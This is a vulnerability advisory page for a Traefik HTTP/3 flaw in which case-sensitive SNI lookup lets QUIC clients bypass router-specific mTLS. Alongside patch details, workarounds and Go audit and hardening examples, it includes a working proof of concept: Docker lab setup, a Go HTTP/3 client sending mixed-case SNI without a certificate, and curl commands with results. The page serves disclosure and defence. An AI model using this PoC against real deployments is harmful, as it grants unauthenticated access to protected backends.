Traefik CVE-2026-53622
Severity (by source): HIGH
Rationale: Network-reachable QUIC with no auth or UI (AV:N/PR:N/UI:N); AC:H because exploitation requires a specific non-default configuration combination; scope changes because the TLS-layer auth gate is bypassed to affect a separately-administered backend (S:C); high C/I impact on the protected backend, no availability impact.
Estimated by vuln.today; no official severity rating has been published for this CVE yet.
Description (CVE.org)
Summary
There is a critical vulnerability in Traefik's HTTP/3 (QUIC) TLS configuration selection that allows unauthenticated clients to bypass router-specific mTLS enforcement. When HTTP/3 is enabled on an entrypoint, the TLS handshake selects the applicable TLS configuration through an exact, case-sensitive lookup on the SNI value, which fails to match wildcard host patterns (e.g., *.example.com) or case variants of the configured hostname. Because the handshake falls back to the default TLS configuration - which may not require client certificates - a client can complete the QUIC handshake without presenting a certificate, while the subsequent HTTP routing layer still dispatches the request to a backend protected by a router-specific mTLS policy. The issue affects deployments where HTTP/3 is enabled, a router uses a wildcard Host rule or case-insensitive hostname matching, a router-specific TLSOptions enforces client certificate authentication, and UDP access to the entrypoint is reachable by an attacker.
Patches
- https://github.com/traefik/traefik/releases/tag/v3.7.3
For more information
If you have any questions or comments about this advisory, please open an issue.
<details> <summary>Original Description</summary>
Summary
Traefik's HTTP/3 TLS configuration selection can ignore router-specific TLSOptions and allow unauthenticated clients to bypass mTLS. The QUIC/HTTP3 path resolves TLS configuration with Router.GetTLSGetClientInfo(), which performs a direct, case-sensitive map lookup on hostHTTPTLSConfig[info.ServerName].
This is inconsistent with the later HTTP host routing semantics, where the same request host can still match wildcard or case-insensitive Host rules after the HTTP/3 TLS handshake has already fallen back to the default TLS configuration. Two exploit paths are confirmed:
- Host(`*.example.com`) with tls.options=mtls: HTTP/2 requires a client certificate, but HTTP/3 reaches the protected backend without one.
- Host(`api.example.com`) with tls.options=mtls: HTTP/2 requires a client certificate, but HTTP/3 with mixed-case SNI/Host such as API.EXAMPLE.COM reaches the protected backend without one.
Confirmed versions:
- wildcard HTTP/3 bypass: v3.7.0, v3.7.1
- exact-host mixed-case HTTP/3 bypass: v3.6.17, v3.7.0, v3.7.1
Details
HTTP/3 installs a QUIC TLS callback in pkg/server/server_entrypoint_tcp_http3.go:

```go
h3.Server = &http3.Server{
	Addr:      config.GetAddress(),
	Port:      config.HTTP3.AdvertisedPort,
	Handler:   httpsServer.Server.(*http.Server).Handler,
	TLSConfig: &tls.Config{GetConfigForClient: h3.getGetConfigForClient},
}
```

The callback is wired to the TCP router's TLS selector:

```go
func (e *http3server) Switch(rt *tcprouter.Router) {
	e.lock.Lock()
	defer e.lock.Unlock()
	e.getter = rt.GetTLSGetClientInfo()
}
```

The selector in pkg/server/router/tcp/router.go only performs an exact map lookup:

```go
func (r *Router) GetTLSGetClientInfo() func(info *tls.ClientHelloInfo) (*tls.Config, error) {
	return func(info *tls.ClientHelloInfo) (*tls.Config, error) {
		if tlsConfig, ok := r.hostHTTPTLSConfig[info.ServerName]; ok {
			return tlsConfig, nil
		}
		return r.httpsTLSConfig, nil
	}
}
```

That creates two mismatches:
- wildcard keys such as *.example.com are never matched for api.example.com
- lower-case router keys such as api.example.com are not matched for mixed-case SNI such as API.EXAMPLE.COM
On the later HTTP request path, the same host can still match wildcard or case-insensitive Host rules through the muxer. The HTTP/3 TLS handshake path falls back to the default TLS config before that routing decision happens. If the default TLS config does not require a client certificate, the QUIC handshake succeeds without mTLS, and the later HTTP router still routes to the protected backend.
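The mismatch between the handshake-time selector and the HTTP muxer can be reproduced in isolation. The following Go program is an added example, not Traefik's code and not the change shipped in v3.7.3: it models the hostHTTPTLSConfig map and the default config as the advisory describes them, re-implements the exact lookup as `vulnerableLookup`, and contrasts it with a hypothetical `hardenedLookup` that lower-cases the SNI and matches single-label wildcards before falling back to the default. The type and function names, the sample configs, and the assumption that a `*.example.com` wildcard matches exactly one label are the example's own.

```go
package main

import (
	"crypto/tls"
	"fmt"
	"strings"
)

// tlsSelector models the state behind Traefik's GetTLSGetClientInfo
// callback as the advisory describes it: per-host TLS configs keyed exactly
// as the router's Host rule spells them, plus the entrypoint's default
// config. Illustrative model, not Traefik's router type.
type tlsSelector struct {
	hostTLSConfig map[string]*tls.Config
	defaultTLS    *tls.Config
}

// vulnerableLookup reproduces the advisory's exact, case-sensitive map
// lookup: any miss silently falls back to the default config.
func (s *tlsSelector) vulnerableLookup(info *tls.ClientHelloInfo) *tls.Config {
	if c, ok := s.hostTLSConfig[info.ServerName]; ok {
		return c
	}
	return s.defaultTLS
}

// hardenedLookup is a hypothetical fix (not Traefik's v3.7.3 change): it
// normalises the SNI the way the HTTP muxer normalises Host, prefers a
// case-insensitive exact match, then a single-label wildcard match, and only
// then falls back to the default config.
func (s *tlsSelector) hardenedLookup(info *tls.ClientHelloInfo) *tls.Config {
	sni := strings.ToLower(strings.TrimSuffix(info.ServerName, "."))
	var wildcard *tls.Config
	for host, c := range s.hostTLSConfig {
		host = strings.ToLower(host)
		if host == sni {
			return c
		}
		if strings.HasPrefix(host, "*.") && matchesWildcard(host, sni) {
			wildcard = c
		}
	}
	if wildcard != nil {
		return wildcard
	}
	return s.defaultTLS
}

// matchesWildcard assumes single-label semantics: "*.example.com" matches
// "api.example.com" but neither "a.b.example.com" nor "example.com".
func matchesWildcard(pattern, sni string) bool {
	suffix := pattern[1:] // "*.example.com" -> ".example.com"
	if !strings.HasSuffix(sni, suffix) {
		return false
	}
	label := strings.TrimSuffix(sni, suffix)
	return label != "" && !strings.Contains(label, ".")
}

// handshakeRequiresClientCert runs one lookup for the given SNI and reports
// whether the selected config would demand a client certificate.
func handshakeRequiresClientCert(s *tlsSelector, sni string, hardened bool) bool {
	info := &tls.ClientHelloInfo{ServerName: sni}
	cfg := s.vulnerableLookup(info)
	if hardened {
		cfg = s.hardenedLookup(info)
	}
	return cfg.ClientAuth == tls.RequireAndVerifyClientCert
}

// advisorySelector builds the advisory's layout: one router keyed by
// routerHost with mTLS TLSOptions, and a default config that does not
// require client certificates (the weak fallback the bypass relies on).
func advisorySelector(routerHost string) *tlsSelector {
	return &tlsSelector{
		hostTLSConfig: map[string]*tls.Config{
			routerHost: {ClientAuth: tls.RequireAndVerifyClientCert},
		},
		defaultTLS: &tls.Config{ClientAuth: tls.NoClientCert},
	}
}

func main() {
	cases := []struct{ routerHost, sni string }{
		{"*.example.com", "api.example.com"},   // wildcard router key
		{"api.example.com", "API.EXAMPLE.COM"}, // mixed-case SNI
	}
	for _, tc := range cases {
		s := advisorySelector(tc.routerHost)
		fmt.Printf("router %-16s SNI %-16s vulnerable mTLS=%-5v hardened mTLS=%v\n",
			tc.routerHost, tc.sni,
			handshakeRequiresClientCert(s, tc.sni, false),
			handshakeRequiresClientCert(s, tc.sni, true))
	}
}
```

The linear scan in `hardenedLookup` is deliberate: it keeps the router keys as the operator wrote them and makes the wildcard rule explicit, which is what a reviewer would want to see next to the one-line map lookup it replaces. In a real router the map would be normalised once at build time instead.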
Preconditions:
- HTTP/3 is enabled on the affected entrypoint.
- A router-specific TLSOptions configuration enforces client certificate authentication.
- The default/fallback TLS configuration does not require client certificates.
- UDP access to the HTTP/3 entrypoint is reachable by the attacker.
Minimal wildcard dynamic configuration:

```yaml
http:
  routers:
    protected:
      rule: Host(`*.example.com`)
      service: protected
      tls:
        options: mtls
  services:
    protected:
      loadBalancer:
        servers:
          - url: http://protected:80
tls:
  certificates:
    - certFile: /certs/server.crt
      keyFile: /certs/server.key
  options:
    mtls:
      clientAuth:
        caFiles:
          - /certs/ca.crt
        clientAuthType: RequireAndVerifyClientCert
```

Minimal exact-host dynamic configuration:
```yaml
http:
  routers:
    protected:
      rule: Host(`api.example.com`)
      service: protected
      tls:
        options: mtls
  services:
    protected:
      loadBalancer:
        servers:
          - url: http://protected:80
tls:
  certificates:
    - certFile: /certs/server.crt
      keyFile: /certs/server.key
  options:
    mtls:
      clientAuth:
        caFiles:
          - /certs/ca.crt
        clientAuthType: RequireAndVerifyClientCert
```

Minimal Docker Compose:
```yaml
services:
  traefik:
    image: traefik:v3.7.1
    command:
      - --log.level=DEBUG
      - --entrypoints.websecure.address=:8443
      - --entrypoints.websecure.http3
      - --providers.file.filename=/etc/traefik/dynamic.yml
      - --providers.file.watch=false
    ports:
      - "8443:8443/tcp"
      - "8443:8443/udp"
    volumes:
      - ./dynamic.yml:/etc/traefik/dynamic.yml:ro
      - ./certs:/certs:ro
    depends_on:
      - protected
  protected:
    image: traefik/whoami:v1.11
    command:
      - --name=PROTECTED
```

Certificate generation:
```shell
rm -rf certs
mkdir -p certs
openssl req -x509 -newkey rsa:2048 -nodes -days 7 -keyout certs/ca.key -out certs/ca.crt -subj "/CN=traefik-poc-ca"
openssl req -newkey rsa:2048 -nodes -keyout certs/server.key -out certs/server.csr -subj "/CN=api.example.com" -addext "subjectAltName=DNS:api.example.com,DNS:*.example.com"
openssl x509 -req -in certs/server.csr -CA certs/ca.crt -CAkey certs/ca.key -CAcreateserial -out certs/server.crt -days 7 -sha256 -copy_extensions copyall
```

The mixed-case HTTP/3 client used for the exact-host case:
```go
package main

import (
	"crypto/tls"
	"fmt"
	"io"
	"net/http"
	"os"
	"time"

	"github.com/quic-go/quic-go/http3"
)

func main() {
	// SNI carried in the QUIC ClientHello. Mixed case by default so the
	// exact, case-sensitive lookup in GetTLSGetClientInfo misses the router key.
	serverName := os.Getenv("TLS_SERVER_NAME")
	if serverName == "" {
		serverName = "API.EXAMPLE.COM"
	}
	// Host (:authority) seen by the HTTP router, which matches Host rules
	// case-insensitively and therefore still dispatches to the mTLS router.
	host := os.Getenv("HTTP_HOST")
	if host == "" {
		host = "API.EXAMPLE.COM"
	}
	// No client certificate is configured on purpose: the point of the PoC is
	// that the handshake succeeds without one.
	tr := &http3.Transport{
		TLSClientConfig: &tls.Config{
			ServerName:         serverName,
			InsecureSkipVerify: true, // the PoC server certificate is self-signed
		},
	}
	defer tr.Close()
	client := &http.Client{Transport: tr, Timeout: 8 * time.Second}
	req, err := http.NewRequest(http.MethodGet, "https://127.0.0.1:8443/", nil)
	if err != nil {
		panic(err)
	}
	req.Host = host
	resp, err := client.Do(req)
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	defer resp.Body.Close()
	fmt.Println(resp.Proto, resp.StatusCode)
	body, _ := io.ReadAll(resp.Body)
	fmt.Print(string(body))
}
```

PoC
Wildcard bypass:
- Start Traefik with the wildcard dynamic configuration above.
- Control over TCP/TLS (HTTP/2):

```shell
curl --noproxy '*' --http2 -skv --resolve api.example.com:8443:127.0.0.1 https://api.example.com:8443/
```

Observed result:

```
TLS alert ... certificate required
```

- HTTP/3 bypass:

```shell
curl --noproxy '*' --http3-only -skv --resolve api.example.com:8443:127.0.0.1 https://api.example.com:8443/
```

Observed result:

```
HTTP/3 200
Name: PROTECTED
Host: api.example.com:8443
```

Exact-host mixed-case bypass:
- Start Traefik with the exact-host dynamic configuration above.
- Control over TCP/TLS (HTTP/2):

```shell
curl --noproxy '*' --http2 -skv --resolve api.example.com:8443:127.0.0.1 https://api.example.com:8443/
```

Observed result:

```
TLS alert ... certificate required
```

- Mixed-case HTTP/2 control:

```shell
curl --noproxy '*' --http2 -skv --resolve API.EXAMPLE.COM:8443:127.0.0.1 https://API.EXAMPLE.COM:8443/
```

Observed result:

```
TLS alert ... certificate required
```

This control confirms that the bypass is specific to the HTTP/3 TLS configuration selection path in this test setup. The HTTP/2 request to the same mixed-case hostname still fails with certificate required.

- HTTP/3 bypass with the same mixed-case hostname:

```shell
TLS_SERVER_NAME=API.EXAMPLE.COM HTTP_HOST=API.EXAMPLE.COM go run ./h3-case-client.go
```

Observed result:

```
HTTP/3.0 200
Name: PROTECTED
Host: API.EXAMPLE.COM
```

Local regression tests used during validation:

```shell
go test ./pkg/server/router/tcp -run 'TestGetTLSGetClientInfo_(WildcardCurrentBehavior|ExactHostCaseSensitivityCurrentBehavior)$' -count=1
```

These tests were added locally during analysis to demonstrate the current behavior of GetTLSGetClientInfo(). They are not required to reproduce the issue; the Docker and curl/HTTP3 commands above are the end-to-end reproduction.
Version matrix observed with Docker images:
- wildcard H3 bypass: affected on v3.7.0 and v3.7.1
- exact-case H3 bypass: affected on v3.6.17, v3.7.0, and v3.7.1
The wildcard case was tested on v3.7.x because wildcard Host / HostSNI matching and TLSOptions association for wildcard domains were introduced in v3.7.0.
Impact
Deployments that use router TLSOptions as an access-control boundary for HTTP/3 can expose protected backends without client authentication.
The highest-impact case is mTLS:
- normal HTTP/2/TCP access to the protected host requires a client certificate
- HTTP/3 access to the same route falls back to the default TLS config
- the request is then routed to the protected backend without satisfying the route's mTLS policy
This can expose confidential data or privileged backend operations to unauthenticated network clients. The issue is especially severe because it does not require credentials, user interaction, or a prior foothold.
Possible workarounds where upgrading to the fixed release (v3.7.3) is not yet possible:
- Disable HTTP/3 on entrypoints that rely on router-specific mTLS.
- Enforce mTLS in the default TLS options as well, so fallback TLS configuration is not weaker than router-specific configuration.
- Block UDP access to the HTTP/3 entrypoint.
- Enforce client authentication at an additional layer behind Traefik.
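The preconditions listed above and the second workaround (a default TLS option no weaker than the router-specific one) can be turned into a configuration audit. The following Go program is an added example, not part of the advisory or of Traefik: it walks a hand-built model of the static entrypoint and dynamic router/tls.options configuration and flags every router that is reachable over HTTP/3, binds router-specific TLSOptions requiring a client certificate, and sits in front of a default TLS option that does not. The struct names, the `AuditMTLSFallback` function and the sample configuration are constructed for the example; the assumption that a router with no entryPoints listed is attached to every entrypoint follows Traefik's documented default.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Minimal hand-built model of the Traefik configuration the advisory refers
// to (not Traefik's own types).
type EntryPoint struct {
	Name  string
	HTTP3 bool // --entrypoints.<name>.http3
}

type Router struct {
	Name        string
	Rule        string   // e.g. Host(`*.example.com`)
	EntryPoints []string // empty: attached to all entrypoints (Traefik default)
	TLSOptions  string   // tls.options; empty means the "default" option
}

type TLSOption struct {
	ClientAuthType string // e.g. RequireAndVerifyClientCert
}

type Finding struct {
	Router, EntryPoint, Reason string
}

// hostRule extracts the literal inside each Host(`...`) matcher of a rule.
var hostRule = regexp.MustCompile("Host\\(`([^`]+)`\\)")

func optionRequiresClientCert(o TLSOption) bool {
	return o.ClientAuthType == "RequireAndVerifyClientCert"
}

// AuditMTLSFallback returns one finding per (router, entrypoint, host) that
// meets the advisory's preconditions. A missing "default" option is treated
// as not requiring client certificates, which is Traefik's implicit default.
func AuditMTLSFallback(eps []EntryPoint, routers []Router, opts map[string]TLSOption) []Finding {
	if optionRequiresClientCert(opts["default"]) {
		return nil // fallback is no weaker than any router policy: not exploitable
	}
	h3 := make(map[string]bool, len(eps))
	allEPs := make([]string, 0, len(eps))
	for _, ep := range eps {
		h3[ep.Name] = ep.HTTP3
		allEPs = append(allEPs, ep.Name)
	}
	var findings []Finding
	for _, r := range routers {
		if r.TLSOptions == "" || r.TLSOptions == "default" || !optionRequiresClientCert(opts[r.TLSOptions]) {
			continue // router relies on the default option, nothing to bypass
		}
		bound := r.EntryPoints
		if len(bound) == 0 {
			bound = allEPs
		}
		for _, ep := range bound {
			if !h3[ep] {
				continue // HTTP/3 off: only the TCP/TLS path exists
			}
			for _, m := range hostRule.FindAllStringSubmatch(r.Rule, -1) {
				host := m[1]
				reason := "exact Host rule " + host + ": a mixed-case SNI such as " +
					strings.ToUpper(host) + " misses the TLSOptions lookup"
				if strings.HasPrefix(host, "*.") {
					reason = "wildcard Host rule " + host + " is never matched by the exact SNI lookup"
				}
				findings = append(findings, Finding{Router: r.Name, EntryPoint: ep, Reason: reason})
			}
		}
	}
	return findings
}

// advisoryConfig is a constructed sample mirroring the advisory's minimal
// deployment: websecure with HTTP/3, an mtls option, and no explicit default.
func advisoryConfig() ([]EntryPoint, []Router, map[string]TLSOption) {
	eps := []EntryPoint{{Name: "web"}, {Name: "websecure", HTTP3: true}}
	routers := []Router{
		{Name: "protected", Rule: "Host(`*.example.com`)", TLSOptions: "mtls"},
		{Name: "api", Rule: "Host(`api.example.com`)", TLSOptions: "mtls", EntryPoints: []string{"websecure"}},
		{Name: "public", Rule: "Host(`www.example.com`)"}, // default option: not a finding
	}
	opts := map[string]TLSOption{"mtls": {ClientAuthType: "RequireAndVerifyClientCert"}}
	return eps, routers, opts
}

func main() {
	eps, routers, opts := advisoryConfig()
	for _, f := range AuditMTLSFallback(eps, routers, opts) {
		fmt.Printf("router %q on entrypoint %q: %s\n", f.Router, f.EntryPoint, f.Reason)
	}
}
```

Flipping the default option to RequireAndVerifyClientCert or turning HTTP/3 off on websecure empties the result, which is exactly the first two workarounds above; the audit does not model UDP reachability, so a non-empty result still has to be read together with the network position of the attacker.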
</details>
---
Analysis (AI-generated)
Authentication bypass in Traefik v3.6.17, v3.7.0, and v3.7.1 allows unauthenticated remote attackers to bypass router-specific mTLS enforcement when HTTP/3 (QUIC) is enabled, exposing protected backends to unauthenticated network clients. The flaw stems from a case-sensitive, exact-match SNI lookup that fails to resolve wildcard host patterns or mixed-case hostnames, causing the QUIC handshake to fall back to a default TLS configuration that does not require client certificates. …
Vulnerability Assessment (AI-generated)
| Aspect | Assessment |
|---|---|
| Exploitation | Exploitation requires all of the following deployment-specific conditions: (1) HTTP/3 explicitly enabled on the affected entrypoint (e.g., --entrypoints.websecure.http3), (2) at least one router that uses either a wildcard Host rule such as Host(`*.example.com`) or relies on case-insensitive hostname matching, (3) a router-specific TLSOptions block enforcing clientAuthType: RequireAndVerifyClientCert, (4) the default/fallback TLS options NOT requiring client certificates, and (5) UDP reachability to the HTTP/3 entrypoint from the attacker. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | No NVD CVSS vector was provided and the advisory does not include an EPSS score or KEV listing, so quantitative exploitation probability is unknown; however, the vendor explicitly labels this 'critical' and the qualitative signals are strong: no authentication, no user interaction, network-reachable UDP entrypoint, and a fully detailed PoC including Docker Compose, certificates, and a Go client. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker with network reachability to the Traefik entrypoint's UDP port (typically 443/udp or 8443/udp) connects over HTTP/3 to a hostname matched by a wildcard router rule such as Host(`*.example.com`), or to an exact-match router using a mixed-case SNI like API.EXAMPLE.COM, and completes the QUIC TLS handshake without presenting any client certificate, because the case-sensitive exact SNI lookup misses the configured TLSOptions and falls back to the default TLS config. The subsequent HTTP request is then routed by the muxer (which honors wildcard and case-insensitive Host rules) to the mTLS-protected backend, granting unauthenticated access to confidential data or privileged backend operations. … |
| Remediation | Vendor-released patch: Traefik v3.7.3, available at https://github.com/traefik/traefik/releases/tag/v3.7.3, which also bundles fixes for CVE-2026-48020 and CVE-2026-48491. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended Action (AI-generated)
24 hours: Disable HTTP/3 (QUIC) in all affected Traefik instances (v3.6.17, v3.7.0, v3.7.1); conduct configuration audit to verify TLS-only operation. …
External PoC / Exploit Code: GHSA-9cr8-q42q-g8m7